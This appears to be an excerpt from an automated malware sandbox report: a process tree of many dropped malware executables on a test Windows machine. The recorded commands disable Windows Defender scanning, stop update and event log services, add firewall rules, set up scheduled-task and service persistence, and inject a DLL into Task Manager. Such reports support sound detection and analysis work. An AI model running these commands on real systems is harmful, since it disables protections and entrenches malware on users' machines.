        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:1704
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:6592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2360
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\070.exe"
  2⤵
  PID:2460
- - C:\Users\Admin\AppData\Local\Temp\a\070.exe
    C:\Users\Admin\AppData\Local\Temp\a\070.exe
    3⤵
    PID:5728
  - - C:\Users\Admin\AppData\Local\Temp\is-OV7B7.tmp\is-CRE2J.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-OV7B7.tmp\is-CRE2J.tmp" /SL4 $803E0 "C:\Users\Admin\AppData\Local\Temp\a\070.exe" 3710753 52224
      4⤵
      PID:1872
    - - C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe
        
        "C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe" -i
        5⤵
        
        PID:7340
    - - C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe
        
        "C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe" -s
        5⤵
        
        PID:8140
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\D21CBE~1.EXE"
  2⤵
  PID:5860
- - C:\Users\Admin\AppData\Local\Temp\a\D21CBE~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\D21CBE~1.EXE
    3⤵
    PID:688
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1672
  - - C:\Users\Admin\AppData\Local\Temp\a\D21CBE~1.EXE
      "C:\Users\Admin\AppData\Local\Temp\a\D21CBE~1.EXE"
      4⤵
      PID:7876
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7980
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:4752
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:6348
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1008
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8332
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe"
  2⤵
  PID:8288
- - C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe
    C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe
    3⤵
    PID:8228
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:8492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5904
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4912
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:8536
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:7960
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:5732
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:6520
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:7084
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:8928
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:5632
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:5328
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:8476
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WSNKISKT"
      4⤵
      Launches sc.exe
      PID:5036
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:4652
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:4952
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WSNKISKT"
      4⤵
      Launches sc.exe
      PID:9188
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe"
  2⤵
  PID:2752
- - C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
    C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
    3⤵
    PID:6944
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe" /F
      4⤵
      PID:2636
    - - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5788
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\288C47~2.EXE"
  2⤵
  PID:7300
- - C:\Users\Admin\AppData\Local\Temp\a\288C47~2.EXE
    C:\Users\Admin\AppData\Local\Temp\a\288C47~2.EXE
    3⤵
    PID:5524
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5524 -s 800
      4⤵
      Program crash
      PID:7604
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\latestX.exe"
  2⤵
  PID:7388
- - C:\Users\Admin\AppData\Local\Temp\a\latestX.exe
    C:\Users\Admin\AppData\Local\Temp\a\latestX.exe
    3⤵
    PID:3580
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe"
  2⤵
  PID:1748
- - C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe
    C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe
    3⤵
    PID:5304
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\Amadey.exe"
  2⤵
  PID:5660
- - C:\Users\Admin\AppData\Local\Temp\a\Amadey.exe
    C:\Users\Admin\AppData\Local\Temp\a\Amadey.exe
    3⤵
    PID:9212
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\NewB.exe"
  2⤵
  PID:6620
- - C:\Users\Admin\AppData\Local\Temp\a\NewB.exe
    C:\Users\Admin\AppData\Local\Temp\a\NewB.exe
    3⤵
    PID:6876
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"
  2⤵
  PID:5552
- - C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe
    C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe
    3⤵
    PID:976
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsu5444.tmp\abc.bat"
      4⤵
      PID:7884
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\cap.exe"
  2⤵
  PID:8036
- - C:\Users\Admin\AppData\Local\Temp\a\cap.exe
    C:\Users\Admin\AppData\Local\Temp\a\cap.exe
    3⤵
    PID:7832
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\UNI400~1.EXE"
  2⤵
  PID:4504
- - C:\Users\Admin\AppData\Local\Temp\a\UNI400~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\UNI400~1.EXE
    3⤵
    PID:6292
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\UNI400~1.EXE" -Force
      4⤵
      PID:5632
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\a\UNI400~1.EXE -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5612
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
      4⤵
      PID:5888
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\XSRGT6~1.EXE"
        5⤵
        
        PID:5456
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\FSKRVY~1.EXE"
        5⤵
        
        PID:8092
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
      4⤵
      PID:7632
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\ISetup10.exe"
  2⤵
  PID:6768
- - C:\Users\Admin\AppData\Local\Temp\a\ISetup10.exe
    C:\Users\Admin\AppData\Local\Temp\a\ISetup10.exe
    3⤵
    PID:4204
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 492
      4⤵
      Program crash
      PID:6744
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\5.exe"
  2⤵
  PID:6120
- - C:\Users\Admin\AppData\Local\Temp\a\5.exe
    C:\Users\Admin\AppData\Local\Temp\a\5.exe
    3⤵
    PID:7412
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\Main.exe"
  2⤵
  PID:5812
- - C:\Users\Admin\AppData\Local\Temp\a\Main.exe
    C:\Users\Admin\AppData\Local\Temp\a\Main.exe
    3⤵
    PID:8332
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8332 -s 1704
      4⤵
      Program crash
      PID:7700
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\E0CBEF~1.EXE"
  2⤵
  PID:3836
- - C:\Users\Admin\AppData\Local\Temp\a\E0CBEF~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\E0CBEF~1.EXE
    3⤵
    PID:6700
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6000
  - - C:\Users\Admin\AppData\Local\Temp\a\E0CBEF~1.EXE
      "C:\Users\Admin\AppData\Local\Temp\a\E0CBEF~1.EXE"
      4⤵
      PID:7204
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2748
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2888
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:4348
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4588
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5904
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:8648
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2932
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1468
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:9136
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5480
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7700
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        
        PID:4912
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6744
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\VIDEOP~1.EXE"
  2⤵
  PID:8312
- - C:\Users\Admin\AppData\Local\Temp\a\VIDEOP~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\VIDEOP~1.EXE
    3⤵
    PID:6780
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1896
      4⤵
      Program crash
      PID:9044
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\TASKWE~1.EXE"
  2⤵
  PID:720
- - C:\Users\Admin\AppData\Local\Temp\a\TASKWE~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\TASKWE~1.EXE
    3⤵
    PID:2704
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      4⤵
      PID:4176
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\setup222.exe"
  2⤵
  PID:7444
- - C:\Users\Admin\AppData\Local\Temp\a\setup222.exe
    C:\Users\Admin\AppData\Local\Temp\a\setup222.exe
    3⤵
    PID:8456
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe"
  2⤵
  PID:7652
- - C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe
    C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe
    3⤵
    PID:2460
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
      4⤵
      PID:6596
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c copy Confirmed Confirmed.cmd & Confirmed.cmd
        5⤵
        
        PID:6188
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:5180
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        6⤵
        
        PID:6424
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:8004
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        6⤵
        
        PID:8424
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 768318
        6⤵
        
        PID:5252
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "PhoneAbcSchedulesApr" Nbc
        6⤵
        
        PID:2888
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B
        6⤵
        
        PID:684
      - C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
        
        768318\Paraguay.pif 768318\B
        6⤵
        
        PID:4924
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Local\Temp\a\\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Local\Temp\a\\TradeWise.url" & exit
        7⤵
        
        PID:7116
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:6628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2936 -ip 2936
1⤵
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5064 -ip 5064
1⤵
PID:4872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 924 -ip 924
1⤵
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1744 -ip 1744
1⤵
PID:2948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3836 -ip 3836
1⤵
PID:4876

C:\Windows\System32\pcaui.exe
C:\Windows\System32\pcaui.exe -n 0 -a "" -v "" -g "" -x ""
1⤵
PID:2636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5196 -ip 5196
1⤵
PID:5368

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5304

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2816 -ip 2816
1⤵
PID:5984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7212 -ip 7212
1⤵
PID:7872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5736 -ip 5736
1⤵
PID:8016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2776 -ip 2776
1⤵
PID:7164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4716 -ip 4716
1⤵
PID:3228

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
PID:6332

C:\Users\Admin\AppData\Roaming\crss.exe
C:\Users\Admin\AppData\Roaming\crss.exe
1⤵
PID:6856
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\crss.exe"
  2⤵
  PID:8640
- - C:\Users\Admin\AppData\Local\Temp\3582-490\crss.exe
    C:\Users\Admin\AppData\Local\Temp\3582-490\crss.exe
    3⤵
    PID:7376

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:9136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6520 -ip 6520
1⤵
PID:8784

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:8792

C:\Users\Admin\AppData\Roaming\crss.exe
C:\Users\Admin\AppData\Roaming\crss.exe
1⤵
PID:8036
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\crss.exe"
  2⤵
  PID:2408
- - C:\Users\Admin\AppData\Local\Temp\3582-490\crss.exe
    C:\Users\Admin\AppData\Local\Temp\3582-490\crss.exe
    3⤵
    PID:6280

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:7540

C:\ProgramData\upki\sxtrr.exe
C:\ProgramData\upki\sxtrr.exe
1⤵
PID:7740
- C:\ProgramData\upki\sxtrr.exe
  "C:\ProgramData\upki\sxtrr.exe"
  2⤵
  PID:3792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4792 -ip 4792
1⤵
PID:8924

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:5784

C:\ProgramData\upki\sxtrr.exe
C:\ProgramData\upki\sxtrr.exe
1⤵
PID:4828
- C:\ProgramData\upki\sxtrr.exe
  "C:\ProgramData\upki\sxtrr.exe"
  2⤵
  PID:8360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5144 -ip 5144
1⤵
PID:6912

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:7272

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:8132

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:5840
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\.exe"
  2⤵
  PID:4796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5524 -ip 5524
1⤵
PID:6040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4204 -ip 4204
1⤵
PID:6632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
- Command and Scripting Interpreter: PowerShell
PID:6596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 8004 -ip 8004
1⤵
PID:7012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8332 -ip 8332
1⤵
PID:7912

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:2236
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1820
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6124
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3884
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:6320
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:1644

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
PID:8088
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6356

C:\Users\Admin\AppData\Roaming\crss.exe
C:\Users\Admin\AppData\Roaming\crss.exe
1⤵
PID:6716
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\crss.exe"
  2⤵
  PID:5592

C:\ProgramData\upki\sxtrr.exe
C:\ProgramData\upki\sxtrr.exe
1⤵
PID:8540
- C:\ProgramData\upki\sxtrr.exe
  "C:\ProgramData\upki\sxtrr.exe"
  2⤵
  PID:8264

C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
1⤵
PID:4580

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
- Power Settings
PID:180
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:8048
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:7252
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:7900
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:8816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:3632

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:7488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 6780 -ip 6780
1⤵
PID:1020

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:3044

C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
1⤵
PID:5156

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:6612
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\EXE~1"
  2⤵
  PID:2892

C:\ProgramData\upki\sxtrr.exe
C:\ProgramData\upki\sxtrr.exe
1⤵
PID:3824
